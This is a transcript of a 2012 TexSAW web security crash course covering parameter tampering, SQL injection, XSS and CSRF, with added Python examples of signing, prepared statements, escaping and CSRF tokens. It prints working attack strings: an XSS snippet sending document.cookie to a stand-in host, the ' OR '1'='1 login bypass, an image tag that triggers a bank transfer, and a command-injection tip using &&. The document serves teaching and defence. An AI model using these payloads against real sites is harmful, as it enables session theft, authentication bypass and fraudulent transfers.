TexSAW 2012 Web Security Crash Course
Transcript of TexSAW 2012 Web Security Crash Course

Presenter: Scott Hand
Introduction
Recommended Tools
- Web browser: Firefox is recommended because of TamperData, Live HTTP Headers, etc.
- Knowing Python helps
- Very little else is needed; BackTrack Linux is useful for many automated tools
What We're Targeting
- Web applications: web pages (HTML, PHP, etc.) and databases
Goal
- Steal data
- Gain access to the system
- Bypass authentication blocks
Background
Web Servers
- Web applications are really just an interface for accessing a web server
- Example web servers: Apache, IIS, Nginx; self-contained servers for one application (Ruby on Rails, Django, Sinatra, node.js, etc.)
- Some servers like Apache resemble navigating a file system; others use RESTful routing
HTTP
- HTTP is the means of communication
- It is stateless; we get around this by using sessions
- Sessions are stored in browser cookies
- Side effect: if we steal someone's cookies, the web server will think we are the same user
HTTP Requests
- Web traffic involves a Request and a Response
- GET and POST are the two main request methods
- GET is for an action intended to ask the server for information
- POST is for an action intended to tell the server to do something
- Examples: GET used for showing your profile on a web site, POST used to update your profile information
HTTP Request Parameters
- Along with the URL and request method, HTTP requests can also carry parameters
- GET parameters are visible in the URL (`http://www.url.com/page.php?arg1=a&arg2=b`) and can be embedded easily in links
- POST parameters are not visible in the URL and not easily embedded in links; however, they can just as easily be altered
Example Scenario
Example Exchange for a Bank Site: Viewing Homepage
Diagram (User, Web Server, Database): the user sends GET index.php to the web server, which consults the database and returns the INDEX page.
Example Exchange for a Bank Site: Logging In
Diagram (User, Web Server, Database): the user POSTs login.php with parameters username and password; the web server authenticates them against the database (Auth → OK), sets up a session, and redirects to the account page.
Example Exchange for a Bank Site: Transferring Some Money
Diagram (User, Web Server, Database): the user POSTs transfer.php with parameters to and amount; the web server makes the changes in the database (OK) and redirects to the account page.
Parameter Tampering
Tools
- TamperData: extension for Firefox. Can intercept and modify requests. Pretty powerful, but can be tedious to use repeatedly
- Live HTTP Headers: extension for Firefox. Good for monitoring and replaying requests. Fast and good as long as replaying traffic works
- Burp Suite: separate program that works through a proxy, so it is browser agnostic. Can do just about everything
Example Attack
Diagram (User, Web Server, Database): the same transfer.php exchange (POST with parameters to and amount, make changes, OK, redirect to account), with the parameters altered before the request reaches the server.
Parameter Tampering
- Example of a real-life attack: PayPal was used by vendors to handle transactions. The vendors trust PayPal and PayPal trusts them.
- Vendors trust that once they send the transaction to PayPal, it will be resolved, and they can send the product when the transaction is complete
- PayPal trusts that the information sent to it by the vendor, through the user's browser (!!!), is correct
- If we change the amount we pay to something small, neither party knows and we get the product for nothing
DEMO
Tips for Securing
- Don't trust requests by themselves! Many frameworks will sign requests that they send to prevent tampering
- Thinking that users can't alter POST data because they can't see it in their address bar is just weak security through obscurity
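The request signing the slide recommends, as an added example that is not from the talk: the server signs the transfer parameters with an HMAC before they pass through the browser, and the receiving side recomputes the signature and rejects the request if the amount was edited in transit. The secret and the parameter names are constructed for the example.

```python
import hmac
import hashlib
from urllib.parse import urlencode, parse_qsl

# Constructed shared secret for the example; a real deployment loads it from config.
SECRET = b"example-shared-secret-not-for-production"


def canonical(params: dict) -> str:
    """Sort the fields so the signed string does not depend on parameter order."""
    return urlencode(sorted((k, v) for k, v in params.items() if k != "sig"))


def sign_params(params: dict, secret: bytes = SECRET) -> dict:
    """Return a copy of params with an HMAC-SHA256 'sig' field appended."""
    sig = hmac.new(secret, canonical(params).encode(), hashlib.sha256).hexdigest()
    return {**params, "sig": sig}


def verify_params(query: str, secret: bytes = SECRET) -> bool:
    """Parse a query string and check its 'sig' over all the other fields."""
    params = dict(parse_qsl(query, keep_blank_values=True))
    presented = params.pop("sig", None)
    if presented is None:
        return False
    expected = hmac.new(secret, canonical(params).encode(), hashlib.sha256).hexdigest()
    # compare_digest avoids leaking the correct signature through timing differences
    return hmac.compare_digest(presented, expected)


def check_transfer_signatures() -> tuple:
    """Sign a transfer, then verify the genuine query and a browser-side tampered copy."""
    signed = sign_params({"to": "vendor", "amount": "100.00"})
    genuine = urlencode(signed)
    # the edit the slides describe: shrink the amount after the server has signed it
    tampered = genuine.replace("amount=100.00", "amount=0.01")
    return verify_params(genuine), verify_params(tampered)
```

Signing stops the amount from being edited, but not an unmodified signed request from being replayed; a nonce or expiry among the signed fields covers that.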
SQL Injections
Overview
- SQL injection is part of a class of attacks in which we abuse poor programming to embed user-controlled data in trusted code run by the server
- Vulnerable code consists of SQL queries built using string concatenation or interpolation with user-tainted variables:

```php
$query = "SELECT * from users "
       . "WHERE username = '" . $username
       . "' AND password = '" . $password . "'";
```
Example Attack
Diagram (User, Web Server, Database): the user POSTs login.php ("Let's look at the SQL and the attack..."); the web server authenticates against the database (Auth → OK) and redirects to the account page.
Behind the Scenes for login.php

```php
$query = "SELECT * from users "
       . "WHERE username = '" . $username
       . "' AND password = '" . $password . "'";
```

- Examine the result to see if the user is selected.
- Sample normal query after input: `SELECT * from users WHERE name='user' AND password='password'`
- Sample attack password: `' OR '1'='1`
- Resulting query: `SELECT * from users WHERE name='user' AND password='' OR '1'='1'`
- Always returns true, bypasses authentication
Other Types of Attacks
- Can add INSERTs, UPDATEs, etc. if multiple queries are supported
- Blind SQL injection: needed when the results of a query are not displayed or even acknowledged
- Use side-channel attacks: sleep for a certain amount of time if the first character of the password is 'a', repeat for each letter until a match is found, then repeat for each character in the password
- sqlmap works wonders to help automate this
DEMO
Tips for Securing
- USE PREPARED STATEMENTS
- Don't plug user input into queries
- Don't escape user-tainted queries
- SERIOUSLY, USE PREPARED STATEMENTS. THEY'RE NOT EVEN HARD TO USE
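The login.php query from the previous slides, rebuilt both ways as an added example (not from the talk) so the two can be run against the same table: the concatenated version accepts the slide's `' OR '1'='1` password, the prepared statement does not. The in-memory SQLite table and its single plaintext row are constructed for the demonstration; real systems store password hashes.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed users table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('user', 'password')")
    return conn


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The slide's vulnerable pattern: user input spliced into the SQL text,
    so a quote in the password becomes SQL syntax."""
    query = ("SELECT * FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_prepared(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Prepared statement: the values travel separately from the SQL text,
    so the database compares the whole password string and never parses it."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def compare_login_checks() -> dict:
    """Run the correct password and the slide's attack password through both versions."""
    conn = make_db()
    payload = "' OR '1'='1"  # the attack password from the slides
    return {
        "concat_correct": login_concat(conn, "user", "password"),
        "concat_injected": login_concat(conn, "user", payload),      # bypass succeeds
        "prepared_correct": login_prepared(conn, "user", "password"),
        "prepared_injected": login_prepared(conn, "user", payload),  # treated as a literal
    }
```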
Cross Site Scripting (XSS)
Overview
- Basic idea is to exploit the trust that your browser places in the website it's viewing
- Embed malicious code in the webpage and your browser will execute it
- Two types:
  - Reflected: client-side. In request parameters or the URL. Requires that a user click the malicious link or form.
  - Stored: server-side. Embedded in a web page and hits every visitor that views the page.
Some Goals
- Steal cookies. Since JavaScript can access cookies, you can send the victim's cookies to yourself:

```html
<script>$.get('www.badurl.com/?cookie=' + document.cookie);</script>
```

- Mimic real user behavior: fill out and submit forms
- Open IFRAMEs to maintain access
- Redirect to other pages
Example Exchange for a Bank Site: Viewing Homepage
Diagram (User, Web Server, Database, Bad Guy): the Bad Guy infects the database content; the user sends GET index.php, the web server returns the INDEX page carrying the injected script, and the user's session is sent to the Bad Guy.
DEMO
Tips for Securing
Developers
- Never, ever allow unauthorized users the ability to embed HTML into your page.
- Escape every single bit of user input you get; it's all dangerous
Users
- Use NoScript or a similar plugin
- Don't click a link with a bunch of JavaScript in the URL
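Output escaping as the slide advises, as an added example that is not from the talk: a stored comment is rendered once unescaped and once through `html.escape`, and the standard-library HTML parser is used to list the start tags a browser would actually see, which is a more reliable check than searching the markup for the string `<script`. The comment wrapper and the payload (the cookie-stealing snippet from the earlier slide) are constructed for the example.

```python
import html
from html.parser import HTMLParser

# Constructed stored-XSS payload: the cookie-stealing snippet shown on the earlier slide
PAYLOAD = "<script>$.get('www.badurl.com/?cookie=' + document.cookie);</script>"


def render_unescaped(comment: str) -> str:
    """Vulnerable: user text dropped straight into the page (stored XSS)."""
    return '<div class="comment">' + comment + '</div>'


def render_escaped(comment: str) -> str:
    """Escape at output time; quote=True also converts ' and " so the same
    helper is safe inside quoted attribute values, not only in element text."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


class TagCollector(HTMLParser):
    """Record every start tag the parser encounters, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup: str) -> list:
    """Return the start tags a browser's parser would see in the markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def compare_renderings() -> tuple:
    """Tags produced by the unescaped and the escaped rendering of the payload."""
    return tags_in(render_unescaped(PAYLOAD)), tags_in(render_escaped(PAYLOAD))
```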
Cross Site Request Forgery (CSRF)
Overview
- Exploit the trust that the web server places in the victim's browser
- It's difficult for a site to distinguish between legitimate requests and requests that an attacker caused
- Not the same as XSS (which exploits the browser's trust in the site), but plays very well with XSS; CSRF is often made more deadly by XSS
Example Exchange for a Bank Site: Transferring Some Money
Diagram (User, Web Server, Database, Bad Guy): caused by the Bad Guy, the user's browser POSTs transfer.php with parameters to=BAD GUY, amount=1000000; the web server makes the changes in the database (OK) and redirects to the account page.
Ways to Trigger
- An image: `<img src="http://www.bank.com/transfer?to=1337&amount=1000000" />`
- XSS: `$.get('./profile.php', function(data) { // evil });`
DEMO
Tips for Securing
- Only trust requests from your site
- Use CSRF-protection tokens: one-time tokens for forms, included in most web frameworks
- Don't make things like bank transfers or logouts a GET request; that just makes life easier for attackers
- Not much you can do as a user
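Both tips in working form, as an added example that is not from the talk: the transfer endpoint refuses GET (so the `<img>` trigger from the earlier slide fails) and requires a token stored in the requester's session (so a POST forged from another site, which cannot read the bank's page, fails too). The in-memory session store and the endpoint shape are constructed; the token here is per session rather than the per-form one-time token the slide mentions.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> session data
SESSIONS = {}


def new_session() -> str:
    """Create a session and give it a random CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid


def transfer_form(sid: str) -> str:
    """The server renders the form with the session's token in a hidden field."""
    token = SESSIONS[sid]["csrf_token"]
    return ('<form method="POST" action="/transfer.php">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def handle_transfer(method: str, sid: str, form: dict) -> tuple:
    """Return (status, message). A state change needs POST plus a token that
    matches the one stored in the requester's own session."""
    if method != "POST":
        return 405, "transfers must be POSTed"  # an <img src=...> can only GET
    session = SESSIONS.get(sid)
    if session is None:
        return 401, "no session"
    presented = form.get("csrf_token", "")
    if not hmac.compare_digest(presented.encode(), session["csrf_token"].encode()):
        return 403, "missing or wrong CSRF token"
    return 200, f"transferred {form['amount']} to {form['to']}"


def exercise_transfer_endpoint() -> list:
    """Status codes for the image trigger, a forged POST without the token, and a genuine form post."""
    sid = new_session()
    token = SESSIONS[sid]["csrf_token"]
    return [
        handle_transfer("GET", sid, {"to": "1337", "amount": "1000000"})[0],
        handle_transfer("POST", sid, {"to": "1337", "amount": "1000000"})[0],
        handle_transfer("POST", sid, {"to": "bob", "amount": "10", "csrf_token": token})[0],
    ]
```

The token defence assumes the attacker cannot read the bank's page; a stored XSS on the same site could fetch the form and its token, which is why the overview slide calls CSRF more deadly when paired with XSS.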
General Tips
Look at Requests!
- Use TamperData, Firebug, Chrome Developer Tools, Live HTTP Headers, etc.
- Look closely at things that you can tamper with to change the behavior of the application; sometimes the developer trusted that data and nothing will stop you
Inject Everything
- If you think it's using your data in SQL, try some SQL injection
- If you think it's embedding your data in a program call (`ping $address`), then inject via things like `&&`
- If you think it's running HTML, throw in some JavaScript
Situational Awareness
- Pay close attention to what kind of web server you're dealing with
- Some web servers or web frameworks are more susceptible than others to certain attacks
- For example, many web frameworks are good at preventing HTML injection, but tend to trust HTTP requests too much
- Keep an eye out for home-brewed stuff, whether it be crypto, injection escaping, web servers, etc.; it's probably not as well vetted against malicious input
JavaScript: It Does a Lot
- If you have jQuery on your website, use it! You can issue requests and parse the results with $.get() and $.post().
- These are so helpful for enhancing XSS attacks (example: do a GET to a user's profile page, pull their info from the form, POST it to your page)
- It gives you tools for shorter JavaScript payloads, especially handy when space is critical
- Pretty much anything on the user's end can be scripted and altered
Any questions?
That's all, CTF Time!
Presented by Scott Hand (utdallas.edu/~shand)